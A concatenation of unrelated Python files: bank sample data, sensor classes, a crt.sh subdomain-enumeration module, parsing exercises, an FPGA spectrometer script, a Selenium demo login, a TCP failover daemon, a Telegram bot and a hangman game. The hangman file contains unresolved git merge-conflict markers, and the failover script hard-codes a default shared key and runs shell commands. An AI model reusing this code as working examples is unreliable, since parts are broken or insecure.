"INSERT INTO `Branch` (name, phone, city, state, zip) VALUES ('Grafton', '9784439888', 'Cambridge', 'MA', '02341')")
cursor.execute(
"INSERT INTO `Branch` (name, phone, city, state, zip) VALUES ('Maple', '6264439888', 'Stockton', 'CA', '95219')")
cursor.execute(
"INSERT INTO `Branch` (name, phone, city, state, zip) VALUES ('Valley', '8062797843', 'Austin', 'TX', '79065')")
cursor.execute(
"INSERT INTO `customer` (first_name, last_name, phone, city, state, zip) VALUES ('Lisa', 'White', '9788477697', 'Cambridge', 'MA', '02341' )")
cursor.execute(
"INSERT INTO `customer` (first_name, last_name, phone, city, state, zip) VALUES ('Sarah', 'Walling', '4132555381', 'Springfield', 'MA', '01103' )")
cursor.execute(
"INSERT INTO `customer` (first_name, last_name, phone, city, state, zip) VALUES ('Ronald', 'Lutz', '2093049067', 'Stockton', 'CA', '95201' )")
cursor.execute(
"INSERT INTO `customer` (first_name, last_name, phone, city, state, zip) VALUES ('Kristin', 'Cook', '2096628424', 'Stockton', 'CA', '95217' )")
cursor.execute(
"INSERT INTO `customer` (first_name, last_name, phone, city, state, zip) VALUES ('Barbara', 'Baker', '5126085577', 'Austin', 'TX', '78746' )")
cursor.execute(
"INSERT INTO `account` (acc_number, acc_type, balance, branch_id, owner_id) VALUES ('2345-8756-9876-5432', 'Savings', 250000.2, 1, 1)")
cursor.execute(
"INSERT INTO `account` (acc_number, acc_type, balance, branch_id, owner_id) VALUES ('2345-8756-9876-5498', 'Savings', 32693.3, 1, 2)")
cursor.execute(
"INSERT INTO `account` (acc_number, acc_type, balance, branch_id, owner_id) VALUES ('9867-4520-0956-1764', 'Savings', 290000.7, 2, 3)")
print("Sample Data inserted successfully")
database.commit()
except pymysql.Error as err:
print('Error: %d: %s' % (err.args[0], err.args[1]))
|
class Weighable():
def __init__(
self,
sensor,
channel,
name,
weight_data,
location = None,
size = None,
tare_wt = None,
net_wt = None
):
self.sensor = sensor # this is a Sensor() instance, already set up
self.set_channel(channel)
self.set_name(name)
self.set_location(location)
self.weight_data = weight_data
self.set_size(size, tare_wt=tare_wt, net_wt=net_wt)
# weight_data must be set for subclasses
# set it in the subclass's __init__ function
# then call super().__init__(port, channel)
#
# def __init__(self, ...)
# self.weight_data = utils.foo_data
# super().__init__(...)
def get_weight(self):
return self.sensor.get_weight(self.channel)
def tare(self):
self.sensor.tare_channel(self.channel)
def calibrate(self, cal_weight):
self.sensor.calibrate_channel(self.channel, cal_weight)
def get_name(self):
return self.name
def set_name(self, name):
self.name = name
def get_location(self):
return self.location
def set_location(self, location):
self.location = location
def get_size(self):
return (self.size, self.tare_wt, self.net_wt)
def set_size(self, size, tare_wt=None, net_wt=None):
# TODO: function logic
# if size is set, pick size, tare_wt, net_wt from size dict
# else, set size to "custom", set tare_wt and net_wt from parameters
# then update Sensor() instance as necessary
try:
self.size = size
self.tare_wt, self.net_wt = self.weight_data[size]
except KeyError: # size key not found in weight_data
self.size = 'custom'
if not tare_wt or not net_wt:
raise ValueError(f"non-standard size {size} requires tare_wt and net_wt, found instead {tare_wt} and {net_wt}")
self.tare_wt = tare_wt
self.net_wt = net_wt
def get_channel(self):
return self.channel
def set_channel(self, channel):
if channel in ('A', 'B'):
self.channel = channel
else:
raise ValueError("no such channel %s" % channel)
|
import time
from crtsh import crtshAPI
from simplydomain.src import core_serialization
from simplydomain.src import module_helpers
from simplydomain.src import core_scrub
class DynamicModule(object):
"""
Dynamic module class that will be loaded and called
at runtime. This will allow modules to easily be independent of the
core runtime.
"""
def __init__(self, json_entry):
"""
Init class structure. Each module takes a JSON entry object which
can pass different values to the module with out changing up the API.
adapted form Empire Project:
https://github.com/EmpireProject/Empire/blob/master/lib/modules/python_template.py
:param json_entry: JSON data object passed to the module.
"""
self.json_entry = json_entry
self.info = {
# mod name
'Module': 'crtsh_search.py',
# long name of the module to be used
'Name': 'Comodo Certificate Fingerprint',
# version of the module to be used
'Version': '1.0',
# description
'Description': ['Uses https://crt.sh search',
'with unofficial search engine support.'],
# authors or sources to be quoted
'Authors': ['@Killswitch-GUI', '@PaulSec'],
# list of resources or comments
'comments': [
'SHA-1 or SHA-256 lookup.'
]
}
self.options = {
# threads for the module to use
'Threads': 1
}
def dynamic_main(self, queue_dict):
"""
Main entry point for process to call.
core_serialization.SubDomain Attributes:
name: long name of method
module_name: name of the module that performed collection
source: source of the subdomain or resource of collection
module_version: version from meta
source: source of the collection
time: time the result obj was built
subdomain: subdomain to use
valid: is domain valid
:return:
"""
core_args = self.json_entry['args']
task_output_queue = queue_dict['task_output_queue']
cs = core_scrub.Scrub()
rd = []
data = crtshAPI().search(str(core_args.DOMAIN))
for d in data:
cs.subdomain = d['issuer']
# check if domain name is valid
valid = cs.validate_domain()
# build the SubDomain Object to pass
sub_obj = core_serialization.SubDomain(
self.info["Name"],
self.info["Module"],
"https://crt.sh",
self.info["Version"],
time.time(),
d['issuer'],
valid
)
# populate queue with return data objects
task_output_queue.put(sub_obj)
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/9/30 14:59
# @Author : Jason
# @Site :
# @File : test_xmltree2.py
# @Software: PyCharm
import xml.etree.ElementTree as ET
tree = ET.parse('country_data.xml')
root = tree.getroot()
print(root)
for neighbor in root.iter('neighbor'):
print(neighbor.attrib)
print('')
for country in root.findall('country'):
rank = country.find('rank').text
name = country.get('name')
print(name,rank)
for rank in root.iter('rank'):
new_rank = int(rank.text) + 1
rank.text = str(new_rank)
rank.set('updated','yes')
tree.write('output.xml') |
#!/usr/bin/python3
'''write and append a text in a file module'''
def append_write(filename="", text=""):
'''Write a function that appends a string at the end of a text file
(UTF8) and returns the number of characters added'''
with open(filename, mode="a", encoding="utf-8") as f:
lenght = f.write(text)
return lenght
|
# Generated by Django 2.2.1 on 2019-05-19 00:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('posts', '0005_auto_20190518_0511'),
]
operations = [
migrations.AlterField(
model_name='post',
name='modification_date',
field=models.DateTimeField(help_text='Date the post was modified from original version.'),
),
migrations.AlterField(
model_name='post',
name='publication_date',
field=models.DateTimeField(help_text='Original publication date.'),
),
]
|
from bs4 import BeautifulSoup
html_doc="""
<html><head><title>The Dormouse's story</title></head>
<body>
<p class="title"><b>The Dormouse's story</b></p>
<p class="story">Once upon a time there were three little sisters; and their names were
<a href="http://example.com/elsie" class="sister" id="link1">Elsie</a>,
<a href="http://example.com/lacie" class="sister" id="link2">Lacie</a> and
<a href="http://example.com/tillie" class="sister" id="link3">Tillie</a>;
and they lived at the bottom of a well.</p>
<string>hello world<b></string>
<p class="story">...</p>
"""
# soup=BeautifulSoup(open('index.html'),'html.parser')
soup=BeautifulSoup(html_doc,'html.parser')
# 格式化输出
# print (soup.prettify())
# print (soup.title)
#
# print (soup.title.name)
#
# print (soup.title.parent.name)
#
# print (soup.p)
#
# print (soup.p['class'])
#
# print (soup.a['class'])
#
# print (soup.find_all('a'))
# print (soup.a['class'][0])
#
# print (soup.find(id="link3"))
# for link in soup.find_all('a'):
# print (link['href'])
# print (link.get('href'))
# print (soup.p.attrs)
# print (soup.p.string) 一个子节点的情况下
# print (soup.p.get_text())
# soup.p.string.replace_with("No longer old")
# print (soup.p)
# 直接子节点
# print (soup.head.contents)
# print (soup.head.contents[0])
# for child in soup.head.children:
# print(child)
# 子孙节点
# for child in soup.head.descendants:
# print(child)
# for string in soup.strings:
# print(repr(string))
# .stripped_strings 去除多余空白内容
# for string in soup.stripped_strings:
# print(repr(string))
# 递归得到元素的所有父辈节点 .parents
# for a in soup.a.parents:
# if a is None:
# print (None)
# else:
# print (a.name)
# 兄弟节点
# next_sibling
# next_siblings 迭代输出
# previous_sibling
# previous_siblings
# for sibling in soup.a.next_siblings:
# if sibling.name=='a':
# print (repr(sibling))
# 正则表达式
# import re
# for tag in soup.find_all(re.compile("^b")):
# print (tag.name)
# 返回所有的tag
# for tag in soup.find_all(True):
# print (tag.name)
# 方法
# def has_class_but_no_id(tag):
# return tag.has_attr('class') and not tag.has_attr('id')
# for tag in soup.find_all(has_class_but_no_id):
# print (tag.name)
# from bs4 import NavigableString
# def surrounded_by_strings(tag):
# return (isinstance(tag.next_sibling,NavigableString) and
# isinstance(tag.previous_sibling,NavigableString))
# for tag in soup.find_all(surrounded_by_strings):
# print (tag.name)
# import re
# soup.find_all(text="Rocky")
# soup.find_all(text=["Fork","Rocky"])
# soup.find_all(text=re.compile("fork"))
# soup.find_all(class_="rocky")
# 限制返回数量
# soup.find_all("a",limit=2)
# 默认是所有的子孙节点 直接子节点recursive=False
# soup.html.find_all("title",recursive=False)
# soup.find('title') <=> soup.find_all('title',limit=1)
# CSS 选择器
# print (soup.select("title"))
# for a in soup.find_all('a'):
# print (a.get('href'))
# for a in soup.select('a'):
# print (a['href'])
# 增
# from bs4 import Comment
# soup=BeautifulSoup("<a>Foo</a>",'html.parser')
# soup.a.append("Bar")
# new_string=soup.new_string(" there")
# soup.a.append(new_string)
# 在内容上添加注释
# new_string=soup.new_string(" Comment",Comment)
# soup.a.append(new_string)
# 添加Tag
# new_tag=soup.new_tag("a",href="http://www.baidu.com")
# soup.a.append(new_tag)
# 删
# 清空内容
# soup.a.clear()
# 移除文档树 并作为方法结果返回
# soup.a.extract()
# 移除文档树 并完全销毁
# soup.a.decompose()
# 改
# soup.a.replace_with(new_tag)
from bs4 import UnicodeDammit
dammit=UnicodeDammit("Sacr\xe9 bleu",["latin-1","iso-8859-1"])
print (dammit.unicode_markup)
|
from flask import Flask
from flask_restful import Resource, Api
from resource.hotel import Hoteis, Hotel
#pip freeze -> Para saber quais pacotes instalados
app = Flask(__name__)
api = Api(app)
api.add_resource(Hoteis, "/hoteis")
api.add_resource(Hotel, "/hoteis/<int:hotel_id>")
if __name__ == '__main__':
app.run(debug=True)
|
def coin_tosses(nums):
print "Starting the program..."
head_count=0
tail_count=0
import random
for i in range(0,nums+1):
print "Attempt #"+str(i)+": Throwing a coin...",
if round(random.random())==1:
print "It's a head! ...",
head_count+=1
else:
print "It's a tail! ...",
tail_count+=1
print "Got " +str(head_count)+" heads(s) so far and "+str(tail_count)+" tails(s) so far"
return
coin_tosses(5000)
|
#!/usr/bin/env python
__author__ = 'Ronie Martinez'
class DidYouMeanError(AttributeError):
def __init__(self, class_name, attribute_name, close_matches):
self.message = "\n".join(["AttributeError: '%s' object has no attribute '%s'." % (class_name, attribute_name),
"Did you mean one of these?"] +
["\t%s" % match for match in close_matches])
self.close_matches = close_matches
class TimeLimitExceededError(Exception):
message = "TimeLimitExceededError: Time limit exceeded!"
|
#
# Class diary
#
# Create program for handling lesson scores.
# Use python to handle student (highscool) class scores, and attendance.
# Make it possible to:
# - Get students total average score (average across classes)
# - get students average score in class
# - hold students name and surname
# - Count total attendance of student
# The default interface for interaction should be python interpreter.
# Please, use your imagination and create more functionalities.
# Your project should be able to handle entire school.
# If you have enough courage and time, try storing (reading/writing)
# data in text files (YAML, JSON).
# If you have even more courage, try implementing user interface.
import argparse
import json
from collections import defaultdict
parser = argparse.ArgumentParser(description='Menu')
class ClassDiary:
diary = defaultdict(list)
courses = ["English", "Maths", "Chemistry", "Physics"]
squad = [["English", [
{'name': 'Jan', 'surname': 'Kowalski', 'attendance': 3, "grades": [3, 4, 5, 3, 3]},
{'name': 'Joahim', 'surname': 'Schmidt', 'attendance': 4, "grades": [5, 5, 5, 5, 5]},
{'name': 'Pedro', 'surname': 'Suarez', 'attendance': 3, "grades": [4, 3, 3, 3, 2]},
{'name': 'John', 'surname': 'Smith', 'attendance': 4, "grades": [3, 4, 4, 2, 2]}]],
["Maths", [
{'name': 'Jan', 'surname': 'Kowalski', 'attendance': 1, "grades": [3, 4, 4, 3, 3]},
{'name': 'Joahim', 'surname': 'Schmidt', 'attendance': 1, "grades": [3, 4, 4, 3, 3]},
{'name': 'Pedro', 'surname': 'Suarez', 'attendance': 3, "grades": [3, 4, 4, 3, 3]},
{'name': 'John', 'surname': 'Smith', 'attendance': 3, "grades": [3, 4, 4, 3, 3]}]]
]
def creatediary(self):
for course, student in self.squad:
self.diary[course].append(student)
def gettotalaverageofstudent(self, name, surname):
total_average = []
for subject, students in self.diary.iteritems():
for student in students:
for person in student:
if person.get('name') == name and person.get('surname') == surname:
grades = person.get('grades')
# print grades
# print sum(grades)/float(len(grades))
total_average.append(sum(grades) / float(len(grades)))
print sum(total_average) / float(len(total_average))
return sum(total_average) / float(len(total_average))
def gettotalaverageofall(self):
total_all_average = []
for subject, students in self.diary.iteritems():
for student in students:
for person in student:
total_all_average.append(self.gettotalaverageofstudent(person.get('name'), person.get('surname')))
print sum(total_all_average) / float(len(total_all_average))
return sum(total_all_average) / float(len(total_all_average))
def getcourseaverageofstudent(self, name, surname, course):
for subject, students in self.diary.iteritems():
if subject == course:
for student in students:
for person in student:
if person.get('name') == name and person.get('surname') == surname:
grades = person.get('grades')
print sum(grades) / float(len(grades))
return sum(grades) / float(len(grades))
def getcourseaverageofall(self, course):
average_of_course = []
for subject, students in self.diary.iteritems():
if subject == course:
for student in students:
for person in student:
average_of_course.append(
self.getcourseaverageofstudent(person.get('name'), person.get('surname'), course))
print sum(average_of_course) / float(len(average_of_course))
def getattendance(self, name, surname):
attendance = []
for subject, students in self.diary.iteritems():
for student in students:
for person in student:
if person.get('name') == name and person.get('surname') == surname:
attendance.append({str(subject): person.get('attendance')})
print attendance
def dumptojson(self):
print json.dumps(classDiary.diary, ensure_ascii=False, sort_keys=True, indent=4)
classDiary = ClassDiary()
classDiary.creatediary()
# classDiary.gettotalaverageofstudent("Jan", "Kowalski")
# classDiary.getcourseaverageofstudent("Jan", "Kowalski", "English")
# classDiary.getcourseaverageofall("English")
# classDiary.getattendance("Jan", "Kowalski")
# TODO: total attendance, user interface, json
|
n = int(input())
s = input()
es,ws = [],[]
if s[0] == 'E':
es.append(1)
ws.append(0)
else:
es.append(0)
ws.append(1)
for i in range(1,n):
if s[i] == 'E':
es.append(es[i-1]+1)
ws.append(ws[i-1])
else:
es.append(es[i-1])
ws.append(ws[i-1]+1)
ans = 9999999
for i in range(n):
if i == 0:
ans = min(ans,es[n-1] - es[0])
else:
ans = min(ans,ws[i-1] + es[n-1] - es[i])
print(ans)
|
from .models import ExtraInfo
from django.forms import ModelForm
class ExtraInfoForm(ModelForm):
"""
The fields on this form are derived from the ExtraInfo model in models.py.
"""
def __init__(self, *args, **kwargs):
super(ExtraInfoForm, self).__init__(*args, **kwargs)
self.fields['your_age'].error_messages = {
"required": u"Please tell us your age group.",
"invalid": u"Please tell us your age group.",
}
self.fields['your_gender'].error_messages = {
"required": u"Please tell us your gender.",
"invalid": u"Please tell us your gender.",
}
self.fields['your_employment'].error_messages = {
"required": u"Please tell us your employment sector.",
"invalid": u"Please tell us your employment sector.",
}
self.fields['your_tenure'].error_messages = {
"required": u"Please tell us your job tenure.",
"invalid": u"Please tell us your job tenure.",
}
class Meta(object):
model = ExtraInfo
fields = ('your_age', 'your_gender', 'your_employment', 'your_tenure')
|
#!/usr/bin/env python
import time, struct, sys, logging, socket
import katcp_wrapper, log_handlers
import argparse
import pyqtgraph as pg
import numpy as np
from pyqtgraph.Qt import QtCore, QtGui
#bitstream = 'sb1k_2016_Oct_21_1640.bof.gz'
#bitstream = 'sb2k_2017_Jan_21_1219.bof.gz'
bitstream = 'sb4k_2017_Jan_21_1934.bof.gz'
#bitstream = 'sb8k_2016_Oct_29_1539.bof.gz'
roach = 'r1511'
katcp_port = 7147
mac_base = (2<<40) + (2<<32) # 0x020200000000
class attrdict(dict):
def __init__(self, **kwargs):
dict.__init__(self, **kwargs)
self.__dict__ = self
opts = attrdict(
nbins = 4 * 2**10,
fftshift = 2**32-1,
gain = 0x0100<<16 | 0x0100,
acclen = 100,
bitsel = 1<<6 | 2<<4 | 2<<2 | 2,
)
def init_10gbe(dev, ip, port, dest_ip, dest_port):
ip_addr, = struct.unpack('!L',socket.inet_aton(ip))
mac_addr = mac_base + ip_addr
devname = dev + '_core'
print('Initializing %s fabric mac: %s, ip: %s, port: %i ...' %
(dev, ':'.join(("%012X" % mac_addr)[i:i+2] for i in range(0, 12, 2)), ip, port)),
fpga.tap_start(dev, devname, mac_addr, ip_addr, port)
print('done')
dest_ip_addr, = struct.unpack('!L',socket.inet_aton(dest_ip))
print('Configuring %s destination IP and port %s:%i ... ' %
(dev, socket.inet_ntoa(struct.pack('!L', dest_ip_addr)), dest_port)),
fpga.write_int(dev + '_dest_ip', dest_ip_addr)
fpga.write_int(dev + '_dest_port', dest_port)
print('done')
# Workaround for tgtap:
# write destination ip address entry in arp table to all 0 mac address
# instead of broadcast address filled by tgtap
fpga.write(devname, '\0'*8, 0x3000 + 8 * (dest_ip_addr & 0xFF))
def exit_clean():
try:
fpga.stop()
except:
pass
exit()
def exit_fail(e):
print('FAILURE DETECTED.')
print('Exception:')
print(e)
print('Log entries:')
lh.printMessages()
exit_clean()
def split_snapshot(snap):
len = snap['length']
all = struct.unpack('%db'%len, snap['data'])
p0 = []
p1 = []
for i in range(len/16):
p0 = p0 + list(all[i*16 : i*16+8])
p1 = p1 + list(all[i*16+8 : (i+1)*16])
return p0, p1
def plot_anim():
global fpga, plts, lines
# ADC histogram
snap = fpga.snapshot_get('zdok0_scope', man_trig=True, man_valid=True)
pol0, pol1 = split_snapshot(snap)
y, x = np.histogram(pol0, 100)
lines[0].setData(x, y)
y, x = np.histogram(pol1, 100)
lines[1].setData(x, y)
# ADC curve
# lines[2].setData(pol0[0:1024])
lines[2].setData(pol0)
lines[3].setData(pol1[0:1024])
# Spectrometer scope
snap = fpga.snapshot_get('x8_vacc_scope_A')
speclin = np.array(struct.unpack('>%dI' % (snap['length']/4), snap['data']))
speclog = np.log2(speclin+1)
lines[4].setData(speclog)
idx = np.argmax(speclog)
print('A:%4d %5.2f, %5.2f ' % (idx, speclog[idx], np.mean(speclog))),
snap = fpga.snapshot_get('x8_vacc_scope_B')
speclin = np.array(struct.unpack('>%dI' % (snap['length']/4), snap['data']))
speclog = np.log2(speclin+1)
lines[5].setData(speclog)
idx = np.argmax(speclog)
print('B:%4d %5.2f, %5.2f ' % (idx, speclog[idx], np.mean(speclog))),
snap = fpga.snapshot_get('x8_vacc_scope_C')
speclin = np.array(struct.unpack('>%di' % (snap['length']/4), snap['data']))
speclog = np.log2(np.fabs(speclin)+1)
lines[6].setData(speclog)
idx = np.argmax(speclog)
print('C:%4d %5.2f, %5.2f ' % (idx, speclog[idx], np.mean(speclog))),
snap = fpga.snapshot_get('x8_vacc_scope_D')
speclin = np.array(struct.unpack('>%di' % (snap['length']/4), snap['data']))
speclog = np.log2(np.fabs(speclin)+1)
lines[7].setData(speclog)
idx = np.argmax(speclog)
print('D:%4d %5.2f, %5.2f ' % (idx, speclog[idx], np.mean(speclog))),
print(bin(fpga.read_uint('status')))
#START OF MAIN:
if __name__ == '__main__':
try:
lh = log_handlers.DebugLogHandler()
logger = logging.getLogger(roach)
logger.addHandler(lh)
logger.setLevel(10)
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--skip', action='store_true', default=False, help='Skip programming FPGA')
parser.add_argument('-v', '--view', action='store_true', default=False, help='View only')
args = parser.parse_args()
print('Connecting to server %s on port %i... ' % (roach, katcp_port)),
fpga = katcp_wrapper.FpgaClient(roach, katcp_port, timeout=10, logger=logger)
time.sleep(0.1)
if fpga.is_connected():
print('ok')
else:
print('ERROR connecting to server %s on port %i.\n' % (roach,katcp_port))
exit_fail()
print('-' * 20)
if not args.skip and not args.view:
print('Programming FPGA with %s ... ' % bitstream),
fpga.progdev(bitstream)
print('done')
if not args.view:
print('Configuring spectrometer fft_shift, fft_shift=0x%X ... ' % opts.fftshift),
fpga.write_int('fft_shift', int(opts.fftshift))
print('done')
print('Configuring spectrometer scale coefficients, gain=0x%X ... ' % opts.gain),
fpga.write_int('gain', opts.gain) # in 16_8-16_8 format
print('done')
print('Configuring spectrometer bit selection, bit_select=0x%X ... ' % opts.bitsel),
fpga.write_int('bit_select', opts.bitsel)
print('done')
print('Configuring spectrometer accumulation length, acc_len=%d ... ' % opts.acclen),
fpga.write_int('acc_len',opts.acclen)
print('done')
init_10gbe('xgbe0', '192.168.11.227', 33333, '192.168.11.127', 12345)
init_10gbe('xgbe1', '192.168.12.227', 33333, '192.168.11.127', 12345)
init_10gbe('xgbe4', '192.168.15.227', 33333, '192.168.15.127', 12345)
init_10gbe('xgbe5', '192.168.16.227', 33333, '192.168.16.127', 12345)
init_10gbe('xgbe6', '192.168.17.227', 33333, '192.168.17.127', 12345)
init_10gbe('xgbe7', '192.168.18.227', 33333, '192.168.18.127', 12345)
fpga.write_int('use_tvg', 0)
print('Issue reset signal...'),
fpga.write_int('reset', 0)
fpga.write_int('reset', 1)
print('done')
# set up the figure with a subplot to be plotted
win = pg.GraphicsWindow(title='Single Beam')
win.resize(1000, 800)
plts = []
lines = []
for i in range(0, 2):
scopenum = i
plt = win.addPlot(title='ADC Hist %d' % scopenum)
plts.append(plt)
lines.append(plt.plot(stepMode=True, fillLevel=0, brush=(0,255,0,150)))
win.nextRow()
for i in range(2, 4):
scopenum = i - 2
plt = win.addPlot(title='ADC Curve %d' % scopenum)
plts.append(plt)
lines.append(plt.plot())
win.nextRow()
for i in range(4, 8):
scopenum = i - 4
plt = win.addPlot(title='SPEC Scope %d' % scopenum)
plts.append(plt)
plt.showGrid(y=True)
plt.setYRange(0, 32)
plt.getAxis('left').setTicks([[(0, '0'), (8, '2^8'), (16, '2^16'), (24, '2^24'), (32, '2^32')]])
lines.append(plt.plot())
if i%2 == 1:
win.nextRow()
print('Plot started.')
plot_anim()
# start the process
timer = QtCore.QTimer()
timer.timeout.connect(plot_anim)
timer.start(1000)
QtGui.QApplication.instance().exec_()
except KeyboardInterrupt:
exit_clean()
except Exception as e:
exit_fail(e)
finally:
exit_clean()
|
from selenium import webdriver
import time
driver = webdriver.Chrome(executable_path="C:\\Users\\ABHAY\\Selenium\\chromedriver.exe")
driver.implicitly_wait(30)
driver.maximize_window()
driver.get("https://opensource-demo.orangehrmlive.com/index.php/auth/login")
#time.sleep(3)
driver.find_element_by_xpath("//input[@id='txtUsername']").send_keys("Admin")
time.sleep(2)
driver.find_element_by_xpath("//input[@id='txtPassword']").send_keys("admin123")
time.sleep(2)
driver.find_element_by_xpath("//input[@id='btnLogin']").click()
time.sleep(2)
driver.quit()
|
from threading import Thread
import socket
import SocketServer
import argparse
import signal
import logging
import subprocess
import sys
import time
ACTIVE = 'ACTIVE'
BACKUP = 'BACKUP'
state = BACKUP
params = {}
class requestHandler(SocketServer.BaseRequestHandler):
def handle(self):
global state
self.request.send("HA:%s:%s:%s:"%(state, params['key'], params['prio']))
return
def check_peer(addr):
global state
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(addr)
response = s.recv(100)
except Exception as e:
log.debug("[%s]: cannot connect to peer, %s" % (state, e))
return 0
responses = ()
if response:
log.debug('[%s]: received from peer "%s"' % (state, response))
s.close()
try:
responses = response.split(':')
except:
log.debug("[%s]: malformed response from peer" % state)
return 0
if responses[0] != 'HA':
log.debug("[%s]: malformed response from peer, not found HA" % state)
return 0
if responses[3].isdigit() != True:
log.debug("[%s]: malformed response from peer, priority not numeric %s" % (state, responses[3]))
return 0
if responses[2] != params['key']:
log.debug("[%s]: received invalid key from peer" % state)
return 0
return int(responses[3])
return 0
def signal_handler(signal, frame):
print "exiting..."
sys.exit(0)
if __name__ == '__main__':
signal.signal(signal.SIGINT, signal_handler)
parser = argparse.ArgumentParser()
parser.add_argument("listen_ip", help="the local ip to bind to")
parser.add_argument("listen_port", type=int, help="the local port to bind to")
parser.add_argument("priority", type=int, help="the local priority")
parser.add_argument("peer_ip", help="the ip to connect to the peer")
parser.add_argument("peer_port", type=int, help="the port to connect to the peer")
parser.add_argument("active_script", help="the script to launch when switching from backup state to active state")
parser.add_argument("backup_script", help="the script to launch when switching from active state to backup state")
parser.add_argument("-v", "--verbose", default=False, action="store_true", help="be more verbose")
parser.add_argument("-k", "--key", default='OdcejToQuor4', help="the shared key between peers")
parser.add_argument("-r", "--retry", type=int, default=3, help="the number of time retrying connecting to the peer when is dead")
parser.add_argument("-i", "--interval", type=int, default=2, help="the interval in second between check to the peer")
args = parser.parse_args()
params['prio'] = args.priority
params['key'] = args.key
if args.verbose:
logging.basicConfig(level=logging.DEBUG, format='%(levelname)s %(message)s')
else:
logging.basicConfig(level=logging.INFO, format='%(levelname)s %(message)s')
log = logging.getLogger(__file__)
srv_addr = (args.listen_ip, args.listen_port)
peer_addr = (args.peer_ip, args.peer_port)
for retry in range(1, 10):
try:
server = SocketServer.TCPServer(srv_addr, requestHandler)
t = Thread(target=server.serve_forever)
t.setDaemon(True)
t.start()
log.info("listen on %s:%s, ready" % (args.listen_ip, args.listen_port))
break
except Exception as e:
log.warning("cannot bind on %s:%s, %s, retrying" % (args.listen_ip, args.listen_port,e))
time.sleep(10)
checked = 0
while True:
peer = check_peer(peer_addr)
if state == BACKUP:
if peer == 0:
if checked >= args.retry:
log.info("[%s]: peer is definitively dead, now becoming ACTIVE" % state)
checked = 0
state = ACTIVE
return_code = subprocess.call(args.active_script, shell=True)
log.info("[%s]: active_script %s return %d" % (state, args.active_script, return_code))
else:
checked += 1
log.info("[%s]: peer is dead %s time, retrying" % (state, checked))
elif peer < params['prio']:
log.info("[%s]: peer is alive but with a lower prio, now becoming ACTIVE" % state)
checked = 0
state = ACTIVE
return_code = subprocess.call(args.active_script, shell=True)
log.info("[%s]: active_script %s return %d" % (state, args.active_script, return_code))
else:
log.info("[%s]: peer is alive with a higher prio, doing nothing" % state)
checked = 0
elif state == ACTIVE:
if peer == 0:
log.info("[%s]: peer is dead but we are active, doing nothing" % state)
elif peer > params['prio']:
log.info("[%s]: peer is alive with a higher prio, becoming BACKUP" % state)
checked = 0
state = BACKUP
return_code = subprocess.call(args.backup_script, shell=True)
log.info("[%s]: backup_script %s return %d" % (state, args.backup_script, return_code))
else:
log.info("[%s]: peer is alive with a lower prio, doing nothing" % state)
checked = 0
time.sleep(args.interval)
|
import asyncio
import logging
import os
from aiogram import Bot, Dispatcher, executor, types
from aiogram.contrib.fsm_storage.memory import MemoryStorage
from aiogram.dispatcher import FSMContext
from aiogram.dispatcher.filters import Text
from aiogram.dispatcher.filters.state import State, StatesGroup
from graph_utils import Last_Month
# Configure logging
logging.basicConfig(
filename='bot.log',
level=logging.DEBUG,
format='%(asctime)s - %(name)s - %(message)s',
datefmt='%d-%b-%y %H:%M:%S')
# Telegram token from Bot Father
TG_TOKEN = os.environ.get('TG_TOKEN')
# Initialize bot and dispatcher
bot = Bot(token=TG_TOKEN)
dp = Dispatcher(bot, storage=MemoryStorage())
class Form(StatesGroup):
""" Fields for tasks """
stock = State()
country = State()
period = State()
# Start with hello message
@dp.message_handler(commands=['start'])
async def send_welcome(message: types.Message):
reply = """
Привет!
Бот для помощи в Инвестициях и Трейдинге
"""
await message.reply(reply)
@dp.message_handler(commands=['get_graph_last_month'])
async def get_graph_last_month(message: types.Message):
reply = """
send me stock, for example of Apple:
AAPL
"""
await message.reply(reply)
await Form.stock.set()
@dp.message_handler(state=Form.stock)
async def process_add_stock(message: types.Message, state: FSMContext):
"""
Process for adding stock
"""
async with state.proxy() as state_data:
state_data['stock'] = message.text
await message.answer(
'Пришлите страну компании')
await Form.country.set()
@dp.message_handler(state=Form.country)
async def process_add_country(message: types.Message, state: FSMContext):
"""
Process for adding country
"""
async with state.proxy() as state_data:
state_data['country'] = message.text
path = Last_Month(state_data['stock'], state_data['country'])
with open(path, 'rb') as photo:
await bot.send_photo(
chat_id=message.from_user.id,
photo=photo,
caption=f"{state_data['stock']}\n{state_data['country']}")
await state.finish()
if __name__ == '__main__':
executor.start_polling(dp, skip_updates=True)
|
#1. List có nhiều từ
#2. random -> ra word
#3. word -> '------'
#4. guess -> 'đúng hay sai' l = list(word)
#5. 'vodka' -> " _ _ _ _ _ a" enumrate
#6. thắng thua
statues = [
"""
|------
| o
| |
|
|
"""
,
"""
|------
| o
| |-
|
|
"""
,
"""
|------
| o
| -|-
|
|
"""
,
"""
|------
| o
| -|-
| \\
|
"""
,
"""
|------
| o
| -|-
| / \\
|
"""
,
]
import random
mylist = ['apple', 'banana','orange']
solution = random.choice(mylist)
list_solution = list(solution)
print("_ "*len(list_solution),sep = " ")
#4 guess
mylist1 = []
for i in range (len(list_solution)):
mylist1.insert(i, '_')
count = 0
count1 = 0
a = True
while a:
<<<<<<< HEAD
your_guess = input("Your word? ").lower();
=======
your_guess = input("Your word? ").lower()
>>>>>>> a899931a0c52fe71f36b1a45b0e2cf20f46081f9
if your_guess in list_solution:
if your_guess in mylist1:
print("You Guessed")
continue
<<<<<<< HEAD
print("You Right!")
=======
print("You Right!")
>>>>>>> a899931a0c52fe71f36b1a45b0e2cf20f46081f9
for index, item in enumerate(list_solution):
if list_solution[index] == your_guess:
mylist1[index] = your_guess
count1 +=1
print(*mylist1,sep = " ")
if count1 == len(list_solution):
<<<<<<< HEAD
print("You Win")
break
else:
print("You Wrong")
=======
print("You are WINNER!")
break
else:
print("You Were Wrong")
>>>>>>> a899931a0c52fe71f36b1a45b0e2cf20f46081f9
count += 1
if count == 1:
print(statues[0])
elif count == 2:
print(statues[1])
elif count == 3:
print(statues[2])
elif count == 4:
print(statues[3])
else:
print(statues[4])
<<<<<<< HEAD
print("you lose")
=======
print("YOU ARE LOSER")
>>>>>>> a899931a0c52fe71f36b1a45b0e2cf20f46081f9
a = False
|
class AddHeader:
def response(self, flow):
flow.response.headers["newheader"] = "foo"
def load(l):
return l.boot_into(AddHeader())
|
# coding:utf8
from flask_wtf import FlaskForm
from wtforms import StringField, RadioField, SubmitField, PasswordField, FileField
